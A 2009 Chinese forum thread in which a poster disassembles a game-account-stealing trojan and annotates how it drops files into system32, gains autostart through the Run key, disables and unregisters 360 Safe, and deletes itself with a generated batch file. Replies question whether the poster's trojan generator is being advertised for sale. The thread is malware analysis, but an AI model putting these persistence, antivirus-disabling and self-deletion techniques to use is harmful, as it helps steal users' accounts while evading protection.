反汇编【乐意木马】
反汇编【乐意木马】-制作木马生成器历时两天。通过反汇编,分析了乐意木马并且做了木马生成器。
在逆向的时候发现了这个:“警告:此文件是废文件,除一段正版验证数据外,没任何作用,逆向此文件的是傻X一个”
在此总结一下。乐意马,运行后在‘system32’目录内分别释放一个dll文件,不同的游戏木马的dll文件不一样。但是都释放一个"system.exe"的exe文件。乐意马都和360安全卫士有仇。
00401000 >55 push ebp ; 入口点
00401001 8BEC mov ebp,esp
00401003 81C4 6CFDFFFF add esp,-294
00401009 6A 00 push 0
0040100B E8 90090000 call
00401010 8985 A0FDFFFF mov dword ptr ss:,eax
00401016 68 A0000000 push 0A0
0040101B 68 00304000 push 乐意梦幻.00403000
00401020 68 00304000 push 乐意梦幻.00403000
00401025 E8 E8030000 call 乐意梦幻.00401412
0040102A E8 29080000 call 乐意梦幻.00401858
=========== call 乐意梦幻.00401858来到下面内容 =======================
00401858 55 push ebp
00401859 8BEC mov ebp,esp
0040185B 81C4 D0FEFFFF add esp,-130
00401861 6A 00 push 0
00401863 6A 02 push 2
00401865 E8 12010000 call <jmp.&KERNEL32.CreateToolhelp32Snapshot> ; 进程快照
0040186A 0BC0 or eax,eax
0040186C 0F84 8B000000 je 乐意梦幻.004018FD
00401872 8985 D4FEFFFF mov dword ptr ss:,eax
00401878 C785 D8FEFFFF 280>mov dword ptr ss:,128
00401882 8D85 D8FEFFFF lea eax,dword ptr ss:
00401888 50 push eax
00401889 FFB5 D4FEFFFF push dword ptr ss:
0040188F E8 5A010000 call <jmp.&KERNEL32.Process32First> ; 获得第一个进程的句柄
00401894 EB 58 jmp short 乐意梦幻.004018EE
00401896 8D85 FCFEFFFF lea eax,dword ptr ss:
0040189C 50 push eax ; System Process
0040189D 68 00304000 push 乐意梦幻.00403000 ; ASCII "my.exe"
004018A2 E8 80FFFFFF call 乐意梦幻.00401827
004018A7 0BC0 or eax,eax
004018A9 74 31 je short 乐意梦幻.004018DC
004018AB FFB5 E0FEFFFF push dword ptr ss:
004018B1 6A 00 push 0
004018B3 6A 01 push 1
004018B5 E8 2E010000 call <jmp.&KERNEL32.OpenProcess>
004018BA 0BC0 or eax,eax
004018BC 74 1E je short 乐意梦幻.004018DC
004018BE 8985 D0FEFFFF mov dword ptr ss:,eax
004018C4 6A 00 push 0
004018C6 FFB5 D0FEFFFF push dword ptr ss:
004018CC E8 2F010000 call <jmp.&KERNEL32.TerminateProcess>
004018D1 FFB5 D0FEFFFF push dword ptr ss:
004018D7 E8 8E000000 call <jmp.&KERNEL32.CloseHandle>
004018DC 8D85 D8FEFFFF lea eax,dword ptr ss:
004018E2 50 push eax
004018E3 FFB5 D4FEFFFF push dword ptr ss:
004018E9 E8 06010000 call <jmp.&KERNEL32.Process32Next>
004018EE 0BC0 or eax,eax
004018F0^ 75 A4 jnz short 乐意梦幻.00401896
004018F2 FFB5 D4FEFFFF push dword ptr ss:
004018F8 E8 6D000000 call <jmp.&KERNEL32.CloseHandle>
004018FD C9 leave
004018FE C3 retn
======================================================
0040102F 68 04010000 push 104
00401034 8D85 FCFEFFFF lea eax,dword ptr ss:
0040103A 50 push eax
0040103B E8 72090000 call <jmp.&KERNEL32.GetSystemDirectoryA>;获得系统目录,准备把HBmhly.dll和system.exe释放到里面
00401040 68 BC204000 push 乐意梦幻.004020BC
00401045 8D85 FCFEFFFF lea eax,dword ptr ss: ; EAX=C:WINDOWSsystem32
0040104B 50 push eax
0040104C E8 C1090000 call
00401051 68 B8314000 push 乐意梦幻.004031B8 ; ASCII "HBmhly.dll"
00401056 8D85 FCFEFFFF lea eax,dword ptr ss:
0040105C 50 push eax
0040105D E8 B0090000 call
00401062 8D85 FCFEFFFF lea eax,dword ptr ss:
00401068 50 push eax ; eax=0012FEBC, (ASCII "C:WINDOWSsystem32HBmhly.dll")
00401069 6A 66 push 66
0040106B 6A 0A push 0A
0040106D FFB5 A0FDFFFF push dword ptr ss:
00401073 E8 09020000 call 乐意梦幻.00401281 ; 从资源里释放dll
00401078 0BC0 or eax,eax
0040107A 0F85 D8000000 jnz 乐意梦幻.00401158
00401080 68 04010000 push 104
00401085 8D85 F8FDFFFF lea eax,dword ptr ss:
0040108B 50 push eax
0040108C E8 21090000 call ;获得系统目录
00401091 8D85 F8FDFFFF lea eax,dword ptr ss:
00401097 50 push eax
00401098 6A 00 push 0
0040109A 6A 00 push 0
0040109C 8D85 F8FDFFFF lea eax,dword ptr ss:
004010A2 50 push eax
004010A3 E8 10090000 call ;获得临时文件路径
004010A8 8D85 F8FDFFFF lea eax,dword ptr ss:
004010AE 50 push eax
004010AF E8 CE080000 call
004010B4 8D85 F8FDFFFF lea eax,dword ptr ss:
004010BA 50 push eax
004010BB 6A 20 push 20
004010BD 8D85 6CFDFFFF lea eax,dword ptr ss:
004010C3 50 push eax
004010C4 E8 AD050000 call 乐意梦幻.00401676
004010C9 8D85 6CFDFFFF lea eax,dword ptr ss:
004010CF 50 push eax
004010D0 8D85 FCFEFFFF lea eax,dword ptr ss:
004010D6 50 push eax
004010D7 E8 FD010000 call 乐意梦幻.004012D9
004010DC 6A 04 push 4
004010DE 6A 00 push 0
004010E0 8D85 F8FDFFFF lea eax,dword ptr ss:
004010E6 50 push eax
004010E7 E8 F0080000 call
004010EC 8D85 FCFEFFFF lea eax,dword ptr ss:
004010F2 50 push eax
004010F3 6A 66 push 66
004010F5 6A 0A push 0A
004010F7 FFB5 A0FDFFFF push dword ptr ss:
004010FD E8 7F010000 call 乐意梦幻.00401281
00401102 0BC0 or eax,eax
00401104 74 52 je short 乐意梦幻.00401158
00401106 68 BE204000 push 乐意梦幻.004020BE ; ASCII "HBInject32"
0040110B 6A 00 push 0
0040110D E8 1E090000 call
00401112 0BC0 or eax,eax
00401114 74 42 je short 乐意梦幻.00401158
00401116 8985 9CFDFFFF mov dword ptr ss:,eax
0040111C C785 90FDFFFF 00>mov dword ptr ss:,0
00401126 68 B8314000 push 乐意梦幻.004031B8 ; ASCII "HBmhly.dll"
0040112B E8 F4080000 call
00401130 8985 94FDFFFF mov dword ptr ss:,eax
00401136 8D05 B8314000 lea eax,dword ptr ds:
0040113C 8985 98FDFFFF mov dword ptr ss:,eax
00401142 8D85 90FDFFFF lea eax,dword ptr ss:
00401148 50 push eax
00401149 6A 00 push 0
0040114B 6A 4A push 4A
0040114D FFB5 9CFDFFFF push dword ptr ss:
00401153 E8 E4080000 call
00401158 68 C9204000 push 乐意梦幻.004020C9 ; ASCII "HBInjectMutex"
0040115D 6A 00 push 0
0040115F 68 03001F00 push 1F0003
00401164 E8 79080000 call
00401169 0BC0 or eax,eax
0040116B 0F85 A4000000 jnz 乐意梦幻.00401215
00401171 E8 1E080000 call
00401176 83F8 02 cmp eax,2
00401179 0F85 9C000000 jnz 乐意梦幻.0040121B
0040117F 68 04010000 push 104
00401184 8D85 FCFEFFFF lea eax,dword ptr ss:
0040118A 50 push eax
0040118B E8 22080000 call
00401190 68 D7204000 push 乐意梦幻.004020D7 ; ASCII "System.exe"
00401195 8D85 FCFEFFFF lea eax,dword ptr ss:
0040119B 50 push eax
0040119C E8 71080000 call
004011A1 8D85 FCFEFFFF lea eax,dword ptr ss:
004011A7 50 push eax
004011A8 6A 65 push 65
004011AA 6A 0A push 0A
004011AC FFB5 A0FDFFFF push dword ptr ss:
004011B2 E8 CA000000 call 乐意梦幻.00401281
004011B7 0BC0 or eax,eax
004011B9 74 58 je short 乐意梦幻.00401213
004011BB C785 B4FDFFFF 44>mov dword ptr ss:,44
004011C5 8D85 B4FDFFFF lea eax,dword ptr ss:
004011CB 50 push eax
004011CC E8 DB070000 call <jmp.&KERNEL32.GetStartupInfoA>
004011D1 8D85 A4FDFFFF lea eax,dword ptr ss:
004011D7 50 push eax
004011D8 8D85 B4FDFFFF lea eax,dword ptr ss:
004011DE 50 push eax
004011DF 6A 00 push 0
004011E1 6A 00 push 0
004011E3 6A 00 push 0
004011E5 6A 00 push 0
004011E7 6A 00 push 0
004011E9 6A 00 push 0
004011EB 8D85 FCFEFFFF lea eax,dword ptr ss:
004011F1 50 push eax
004011F2 6A 00 push 0
004011F4 E8 7D070000 call <jmp.&KERNEL32.CreateProcessA> ;创建system.exe进程
004011F9 0BC0 or eax,eax
004011FB 74 16 je short 乐意梦幻.00401213
004011FD FFB5 A4FDFFFF push dword ptr ss:
00401203 E8 62070000 call
00401208 FFB5 A8FDFFFF push dword ptr ss:
0040120E E8 57070000 call <jmp.&KERNEL32.CloseHandle>
00401213 EB 06 jmp short 乐意梦幻.0040121B
00401215 50 push eax
00401216 E8 4F070000 call <jmp.&KERNEL32.CloseHandle>
0040121B 6A 00 push 0 ;以下为创建自启动
0040121D 68 E3204000 push 乐意梦幻.004020E3 ; ASCII "AskTao"
00401222 E8 12020000 call 乐意梦幻.00401439
00401227 E8 9F040000 call 乐意梦幻.004016CB
0040122C 8D85 8CFDFFFF lea eax,dword ptr ss:
00401232 50 push eax
00401233 68 3F000F00 push 0F003F
00401238 6A 00 push 0
0040123A 68 EA204000 push 乐意梦幻.004020EA ; ASCII "SoftwareMicrosoftWindowsCurrentVersionRun"
0040123F 68 02000080 push 80000002
00401244 E8 05080000 call <jmp.&ADVAPI32.RegOpenKeyExA>
00401249 0BC0 or eax,eax
0040124B 75 26 jnz short 乐意梦幻.00401273
0040124D 6A 0B push 0B
0040124F 68 24214000 push 乐意梦幻.00402124 ; ASCII "System.exe"
00401254 6A 01 push 1
00401256 6A 00 push 0
00401258 68 18214000 push 乐意梦幻.00402118 ; ASCII "HBService32"
0040125D FFB5 8CFDFFFF push dword ptr ss:
00401263 E8 EC070000 call
00401268 FFB5 8CFDFFFF push dword ptr ss:
0040126E E8 CF070000 call <jmp.&ADVAPI32.RegCloseKey>;自启动信息写入注册表,至此,软件木马能开机自启动了
00401273 E8 FE010000 call 乐意梦幻.00401476 ;从这里正式开始运行木马了
============call 乐意梦幻.00401476来到下面========================
00401476 55 push ebp
00401477 8BEC mov ebp,esp
00401479 83C4 E4 add esp,-1C
0040147C EB 4B jmp short 乐意梦幻.004014C9
0040147E 6F outs dx,dword ptr es:
0040147F 70 65 jo short 乐意梦幻.004014E6
00401481 6E outs dx,byte ptr es:
00401482 005C00 3A add byte ptr ds:,bl
00401486 52 push edx
00401487 65:70 65 jo short 乐意梦幻.004014EF
0040148A 61 popad
0040148B 74 0D je short 乐意梦幻.0040149A
0040148D 0A00 or al,byte ptr ds:
0040148F 64: prefix fs:
00401490 65:6C ins byte ptr es:,dx
00401492 2022 and byte ptr ds:,ah
00401494 0022 add byte ptr ds:,ah
00401496 000D 0A696620 add byte ptr ds:,cl
0040149C 65:78 69 js short 乐意梦幻.00401508
0040149F 73 74 jnb short 乐意梦幻.00401515
004014A1 2022 and byte ptr ds:,ah
004014A3 0022 add byte ptr ds:,ah
004014A5 2067 6F and byte ptr ds:,ah
004014A8 74 6F je short 乐意梦幻.00401519
004014AA 2052 65 and byte ptr ds:,dl
004014AD 70 65 jo short 乐意梦幻.00401514
004014AF 61 popad
004014B0 74 0D je short 乐意梦幻.004014BF
004014B2 0A00 or al,byte ptr ds:
004014B4 72 6D jb short 乐意梦幻.00401523
004014B6 64:6972 20 220022>imul esi,dword ptr fs:,0D220022
004014BE 0A6465 6C or ah,byte ptr ss:
004014C2 2022 and byte ptr ds:,ah
004014C4 0022 add byte ptr ds:,ah
004014C6 0D 0A00E8D8 or eax,D8E8000A
004014CB 04 00 add al,0
004014CD 0089 45F468F8 add byte ptr ds:,cl
004014D3 07 pop es
004014D4 0000 add byte ptr ds:,al
004014D6 6A 08 push 8
004014D8 FF75 F4 push dword ptr ss:
004014DB E8 E4040000 call <jmp.&KERNEL32.HeapAlloc>
004014E0 8945 EC mov dword ptr ss:,eax
004014E3 05 04010000 add eax,104
004014E8 8945 EC mov dword ptr ss:,eax
004014EB 05 04010000 add eax,104
004014F0 8945 F0 mov dword ptr ss:,eax
004014F3 05 04010000 add eax,104
004014F8 8945 E8 mov dword ptr ss:,eax
004014FB 05 04010000 add eax,104
00401500 8945 E4 mov dword ptr ss:,eax
00401503 FF75 E8 push dword ptr ss:
00401506 68 04010000 push 104
0040150B E8 AE040000 call <jmp.&KERNEL32.GetTempPathA>;上面没什么好说的,自此,在临时文件夹创建一个SelfDel.bat 的批处理,来实现自删除。
00401510 68 41214000 push 乐意梦幻.00402141 ; ASCII "SelfDel.bat"
00401515 FF75 E8 push dword ptr ss:
00401518 E8 F5040000 call <jmp.&KERNEL32.lstrcatA>
0040151D 6A 00 push 0
0040151F 68 80000008 push 8000080
00401524 6A 02 push 2
00401526 6A 00 push 0
00401528 6A 00 push 0
0040152A 68 00000040 push 40000000
0040152F FF75 E8 push dword ptr ss:
00401532 E8 39040000 call <jmp.&KERNEL32.CreateFileA>
00401537 8945 FC mov dword ptr ss:,eax
0040153A 837D FC FF cmp dword ptr ss:,-1
0040153E 0F84 23010000 je 乐意梦幻.00401667
00401544 68 04010000 push 104
00401549 FF75 F0 push dword ptr ss:
0040154C 6A 00 push 0
0040154E E8 47040000 call <jmp.&KERNEL32.GetModuleFileNameA> ;获得要删除文件的的名称和路径
00401553 FF75 F0 push dword ptr ss:
00401556 FF75 EC push dword ptr ss:
00401559 E8 C0040000 call <jmp.&KERNEL32.lstrcpyA>
0040155E B8 5E154000 mov eax,乐意梦幻.0040155E
00401563 3D 63154000 cmp eax,乐意梦幻.00401563
00401568 74 07 je short 乐意梦幻.00401571
0040156A B8 81154000 mov eax,乐意梦幻.00401581
0040156F FFE0 jmp eax
00401571 48 dec eax
00401572 65:6C ins byte ptr es:,dx
00401574 6C ins byte ptr es:,dx
00401575 6F outs dx,dword ptr es:
00401576 204B 61 and byte ptr ds:,cl
00401579 73 70 jnb short 乐意梦幻.004015EB
0040157B 65:72 73 jb short 乐意梦幻.004015F1
0040157E 6B79 00 8B imul edi,dword ptr ds:,-75
00401582 55 push ebp
00401583 EC in al,dx
00401584 8BCA mov ecx,edx
00401586 8A02 mov al,byte ptr ds:
00401588 3C 5C cmp al,5C
0040158A 75 02 jnz short 乐意梦幻.0040158E
0040158C 8BCA mov ecx,edx
0040158E 42 inc edx
0040158F 0AC0 or al,al
00401591^ 75 F3 jnz short 乐意梦幻.00401586
00401593 C641 01 00 mov byte ptr ds:,0
00401597 68 85144000 push 乐意梦幻.00401485 ; ASCII ":Repeat
"
0040159C FF75 E4 push dword ptr ss:
0040159F E8 6E040000 call <jmp.&KERNEL32.lstrcatA>
004015A4 68 8F144000 push 乐意梦幻.0040148F ; ASCII "del ""
004015A9 FF75 E4 push dword ptr ss:
004015AC E8 61040000 call <jmp.&KERNEL32.lstrcatA>
004015B1 FF75 F0 push dword ptr ss:
004015B4 FF75 E4 push dword ptr ss:
004015B7 E8 56040000 call <jmp.&KERNEL32.lstrcatA>
004015BC 68 95144000 push 乐意梦幻.00401495
004015C1 FF75 E4 push dword ptr ss:
004015C4 E8 49040000 call <jmp.&KERNEL32.lstrcatA>
004015C9 68 97144000 push 乐意梦幻.00401497 ; ASCII "
if exist ""
004015CE FF75 E4 push dword ptr ss:
004015D1 E8 3C040000 call <jmp.&KERNEL32.lstrcatA>
004015D6 FF75 F0 push dword ptr ss:
004015D9 FF75 E4 push dword ptr ss:
004015DC E8 31040000 call <jmp.&KERNEL32.lstrcatA>
004015E1 68 A4144000 push 乐意梦幻.004014A4 ; ASCII "" goto Repeat
"
004015E6 FF75 E4 push dword ptr ss:
004015E9 E8 24040000 call <jmp.&KERNEL32.lstrcatA>
004015EE 68 B4144000 push 乐意梦幻.004014B4 ; ASCII "rmdir ""
004015F3 FF75 E4 push dword ptr ss:
004015F6 E8 17040000 call <jmp.&KERNEL32.lstrcatA>
004015FB FF75 EC push dword ptr ss:
004015FE FF75 E4 push dword ptr ss:
00401601 E8 0C040000 call <jmp.&KERNEL32.lstrcatA>
00401606 68 BC144000 push 乐意梦幻.004014BC ; ASCII ""
del ""
0040160B FF75 E4 push dword ptr ss:
0040160E E8 FF030000 call <jmp.&KERNEL32.lstrcatA>
00401613 FF75 E8 push dword ptr ss:
00401616 FF75 E4 push dword ptr ss:
00401619 E8 F4030000 call <jmp.&KERNEL32.lstrcatA>
0040161E 68 C5144000 push 乐意梦幻.004014C5 ; ASCII ""
"
00401623 FF75 E4 push dword ptr ss:
00401626 E8 E7030000 call <jmp.&KERNEL32.lstrcatA>
0040162B FF75 E4 push dword ptr ss:
0040162E E8 F1030000 call <jmp.&KERNEL32.lstrlenA>
00401633 8945 F8 mov dword ptr ss:,eax
00401636 6A 00 push 0
00401638 8D45 F8 lea eax,dword ptr ss:
0040163B 50 push eax
0040163C FF75 F8 push dword ptr ss:
0040163F FF75 E4 push dword ptr ss:
00401642 FF75 FC push dword ptr ss:
00401645 E8 C2030000 call <jmp.&KERNEL32.WriteFile>
0040164A FF75 FC push dword ptr ss:
0040164D E8 18030000 call <jmp.&KERNEL32.CloseHandle>
00401652 6A 00 push 0
00401654 6A 00 push 0
00401656 6A 00 push 0
00401658 FF75 E8 push dword ptr ss:
0040165B 68 4D214000 push 乐意梦幻.0040214D ; ASCII "open"
00401660 6A 00 push 0
00401662 E8 F3030000 call <jmp.&SHELL32.ShellExecuteA> ;执行SelfDel.bat
00401667 FF75 EC push dword ptr ss:
0040166A 6A 00 push 0
0040166C FF75 F4 push dword ptr ss:
0040166F E8 56030000 call <jmp.&KERNEL32.HeapFree>
00401674 C9 leave
00401675 C3 retn
00401676 55 push ebp
00401677 8BEC mov ebp,esp
00401679 57 push edi
0040167A FF75 0C push dword ptr ss:
0040167D FF75 08 push dword ptr ss:
00401680 E8 DF020000 call <jmp.&NTDLL.RtlZeroMemory>
00401685 FF75 10 push dword ptr ss:
00401688 E8 97030000 call <jmp.&KERNEL32.lstrlenA>
0040168D 48 dec eax
0040168E EB 1B jmp short 乐意梦幻.004016AB
00401690 8B7D 10 mov edi,dword ptr ss:
00401693 8A1C38 mov bl,byte ptr ds:
00401696 80FB 5C cmp bl,5C
00401699 75 0F jnz short 乐意梦幻.004016AA
0040169B 0345 10 add eax,dword ptr ss:
0040169E 40 inc eax
0040169F 50 push eax
004016A0 FF75 08 push dword ptr ss:
004016A3 E8 76030000 call <jmp.&KERNEL32.lstrcpyA>
004016A8 EB 05 jmp short 乐意梦幻.004016AF
004016AA 48 dec eax
004016AB 0BC0 or eax,eax
004016AD^ 75 E1 jnz short 乐意梦幻.00401690
004016AF FF75 08 push dword ptr ss:
004016B2 E8 6D030000 call <jmp.&KERNEL32.lstrlenA>
004016B7 0BC0 or eax,eax
004016B9 75 0B jnz short 乐意梦幻.004016C6
004016BB FF75 10 push dword ptr ss:
004016BE FF75 08 push dword ptr ss:
004016C1 E8 58030000 call <jmp.&KERNEL32.lstrcpyA>
004016C6 5F pop edi
004016C7 C9 leave
004016C8 C2 0C00 retn 0C
004016CB 55 push ebp
004016CC 8BEC mov ebp,esp
004016CE 83C4 F8 add esp,-8
004016D1 8D45 FC lea eax,dword ptr ss:
004016D4 50 push eax
004016D5 68 3F000F00 push 0F003F
004016DA 6A 00 push 0
004016DC 68 52214000 push 乐意梦幻.00402152 ; ASCII "Software\360Safe\safemon"
004016E1 68 02000080 push 80000002
004016E6 E8 63030000 call <jmp.&ADVAPI32.RegOpenKeyExA>
004016EB 0BC0 or eax,eax
004016ED 0F85 F2000000 jnz 乐意梦幻.004017E5
004016F3 8365 F8 00 and dword ptr ss:,0
004016F7 6A 04 push 4
004016F9 8D45 F8 lea eax,dword ptr ss:
004016FC 50 push eax
004016FD 6A 04 push 4
004016FF 6A 00 push 0
00401701 68 6B214000 push 乐意梦幻.0040216B ; ASCII "ARPAccess"
00401706 FF75 FC push dword ptr ss:
00401709 E8 46030000 call <jmp.&ADVAPI32.RegSetValueExA>
0040170E 6A 04 push 4
00401710 8D45 F8 lea eax,dword ptr ss:
00401713 50 push eax
00401714 6A 04 push 4
00401716 6A 00 push 0
00401718 68 75214000 push 乐意梦幻.00402175 ; ASCII "ExecAccess"
0040171D FF75 FC push dword ptr ss:
00401720 E8 2F030000 call <jmp.&ADVAPI32.RegSetValueExA>
00401725 6A 04 push 4
00401727 8D45 F8 lea eax,dword ptr ss:
0040172A 50 push eax
0040172B 6A 04 push 4
0040172D 6A 00 push 0
0040172F 68 80214000 push 乐意梦幻.00402180 ; ASCII "IEProtAccess"
00401734 FF75 FC push dword ptr ss:
00401737 E8 18030000 call <jmp.&ADVAPI32.RegSetValueExA>
0040173C 6A 04 push 4
0040173E 8D45 F8 lea eax,dword ptr ss:
00401741 50 push eax
00401742 6A 04 push 4
00401744 6A 00 push 0
00401746 68 8D214000 push 乐意梦幻.0040218D ; ASCII "LeakShowed"
0040174B FF75 FC push dword ptr ss:
0040174E E8 01030000 call <jmp.&ADVAPI32.RegSetValueExA>
00401753 6A 04 push 4
00401755 8D45 F8 lea eax,dword ptr ss:
00401758 50 push eax
00401759 6A 04 push 4
0040175B 6A 00 push 0
0040175D 68 98214000 push 乐意梦幻.00402198 ; ASCII "MonAccess"
00401762 FF75 FC push dword ptr ss:
00401765 E8 EA020000 call <jmp.&ADVAPI32.RegSetValueExA>
0040176A 6A 04 push 4
0040176C 8D45 F8 lea eax,dword ptr ss:
0040176F 50 push eax
00401770 6A 04 push 4
00401772 6A 00 push 0
00401774 68 A2214000 push 乐意梦幻.004021A2 ; ASCII "NoNotiLeak"
00401779 FF75 FC push dword ptr ss:
0040177C E8 D3020000 call <jmp.&ADVAPI32.RegSetValueExA>
00401781 6A 04 push 4
00401783 8D45 F8 lea eax,dword ptr ss:
00401786 50 push eax
00401787 6A 04 push 4
00401789 6A 00 push 0
0040178B 68 AD214000 push 乐意梦幻.004021AD ; ASCII "NoNotiNews"
00401790 FF75 FC push dword ptr ss:
00401793 E8 BC020000 call <jmp.&ADVAPI32.RegSetValueExA>
00401798 6A 04 push 4
0040179A 8D45 F8 lea eax,dword ptr ss:
0040179D 50 push eax
0040179E 6A 04 push 4
004017A0 6A 00 push 0
004017A2 68 B8214000 push 乐意梦幻.004021B8 ; ASCII "SiteAccess"
004017A7 FF75 FC push dword ptr ss:
004017AA E8 A5020000 call <jmp.&ADVAPI32.RegSetValueExA>
004017AF 6A 04 push 4
004017B1 8D45 F8 lea eax,dword ptr ss:
004017B4 50 push eax
004017B5 6A 04 push 4
004017B7 6A 00 push 0
004017B9 68 C3214000 push 乐意梦幻.004021C3 ; ASCII "UDiskAccess"
004017BE FF75 FC push dword ptr ss:
004017C1 E8 8E020000 call <jmp.&ADVAPI32.RegSetValueExA>
004017C6 6A 04 push 4
004017C8 8D45 F8 lea eax,dword ptr ss:
004017CB 50 push eax
004017CC 6A 04 push 4
004017CE 6A 00 push 0
004017D0 68 CF214000 push 乐意梦幻.004021CF ; ASCII "weeken"
004017D5 FF75 FC push dword ptr ss:
004017D8 E8 77020000 call <jmp.&ADVAPI32.RegSetValueExA>
004017DD FF75 FC push dword ptr ss:
004017E0 E8 5D020000 call <jmp.&ADVAPI32.RegCloseKey>
004017E5 8D45 FC lea eax,dword ptr ss:
004017E8 50 push eax
004017E9 68 3F000F00 push 0F003F
004017EE 6A 00 push 0
004017F0 68 EA204000 push 乐意梦幻.004020EA ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
004017F5 68 02000080 push 80000002
004017FA E8 4F020000 call <jmp.&ADVAPI32.RegOpenKeyExA>
004017FF 0BC0 or eax,eax
00401801 75 22 jnz short 乐意梦幻.00401825
00401803 68 D6214000 push 乐意梦幻.004021D6 ; ASCII "360Safetray"
00401808 FF75 FC push dword ptr ss:
0040180B E8 38020000 call <jmp.&ADVAPI32.RegDeleteValueA>
00401810 68 E2214000 push 乐意梦幻.004021E2 ; ASCII "360Safebox"
00401815 FF75 FC push dword ptr ss:
00401818 E8 2B020000 call <jmp.&ADVAPI32.RegDeleteValueA>
0040181D FF75 FC push dword ptr ss:
00401820 E8 1D020000 call <jmp.&ADVAPI32.RegCloseKey>
00401825 C9 leave
00401826 C3 retn
============================================================
00401278 6A 00 push 0
0040127A E8 09070000 call <jmp.&KERNEL32.ExitProcess>
0040127F C9 leave
00401280 C3 retn
木马的启动原理很简单:softwaremicrosoftwindowscurrentversion un,很容易就会被发现。
通过一段批处理(selfdel.bat)实现自删除,代码如下:
004015C9 68 97144000 push 大话2__3.00401497 ; if exist "
004015CE FF75 E4 push dword ptr ss:
004015D1 E8 3C040000 call
004015D6 FF75 F0 push dword ptr ss:
004015D9 FF75 E4 push dword ptr ss:
004015DC E8 31040000 call
004015E1 68 A4144000 push 大话2__3.004014A4 ; " goto repeat
004015E6 FF75 E4 push dword ptr ss:
004015E9 E8 24040000 call
004015EE 68 B4144000 push 大话2__3.004014B4 ; rmdir "
004015F3 FF75 E4 push dword ptr ss:
004015F6 E8 17040000 call
004015FB FF75 EC push dword ptr ss:
004015FE FF75 E4 push dword ptr ss:
00401601 E8 0C040000 call
00401606 68 BC144000 push 大话2__3.004014BC ; " del "
0040160B FF75 E4 push dword ptr ss:
0040160E E8 FF030000 call
00401613 FF75 E8 push dword ptr ss:
00401616 FF75 E4 push dword ptr ss:
00401619 E8 F4030000 call
0040161E 68 C5144000 push 大话2__3.004014C5 ; "
由于此木马危害性极大,为了防止有人用于非法用途,以上程序和源码我就不对外发布了。 支持多发病毒分析的文章.
不过,从病毒分析的角度来看,分析的还不够详细,仅仅是分析了下自启动和自删除.如木马是如何运转的等细节没任何描述.
期待更详细的分析. 能不能理解成广告?
呵呵`
为啥说是广告很容易理解
分析 只分析了大概 没说明算法部分
直接截生成的图
在仔细看生成的时间
我想说成广告还是对地
[ 本帖最后由 iovejieba 于 2009-1-10 15:07 编辑 ] 我晕这么强的 东西 LS的说是广告……
我倒 我这个人比较笨,我也理解成广告了,生成器标题时间2009.1.10说明了什么 日了,生成器标题时间2009.1.10是表示我今天发表的帖子,而且是我今天编译的源码 ,如果这就是广告。他妈的。我无语了。至于有人说我没有说明详细算法,那是我水平不够,讲不出来算法。如果你要是看我的图片不爽,可以叫管理员吧我的图片删了,如果你认为是垃圾贴,那么你也可以向管理员举报。相信每个人心中都有一把尺,让大家去度量去吧! 贴几张木马生成图,然后贴上自己的QQ;
帖子说:由于此木马危害性极大,为了防止有人用于非法用途。以上程序和源码我就不对外发布了。
你知道危害极大,那你还打上客服QQ,这个客服QQ是卖木马呢?还是送木马呢?还是告诉别人我有木马不过不对外发布?
找到了别人木马的URL地址,写生成器,打上自己的QQ出售。我能这么理解吗?:D 欢迎LZ分析病毒的技术交流,最好能再分析得详细一点~
至于LZ发出来的图片,与文章的分析无任何关系,而且也难免会让人误认AD之嫌~~所以我删除掉了.... 本人就事论事
没别的意思 既然能写生成了 算法也就已经是知道了 何不公开算法?
呵呵`没别的意思仅共本人消遣
如有冒犯 先说声 SORRY 原帖由 iovejieba 于 2009-1-10 20:12 发表 http://www.52pojie.cn/images/common/back.gif
本人就事论事
没别的意思 既然能写生成了 算法也就已经是知道了 何不公开算法?
呵呵`没别的意思仅共本人消遣
如有冒犯 先说声 SORRY
没什么冒犯,LZ写的文章,确实和文章标题不大一致...只是简单分析一下~~而且...制作生成器的,就算了,又不是要做木马?如果是算法分析的话,那应该不错~
页:
[1]
2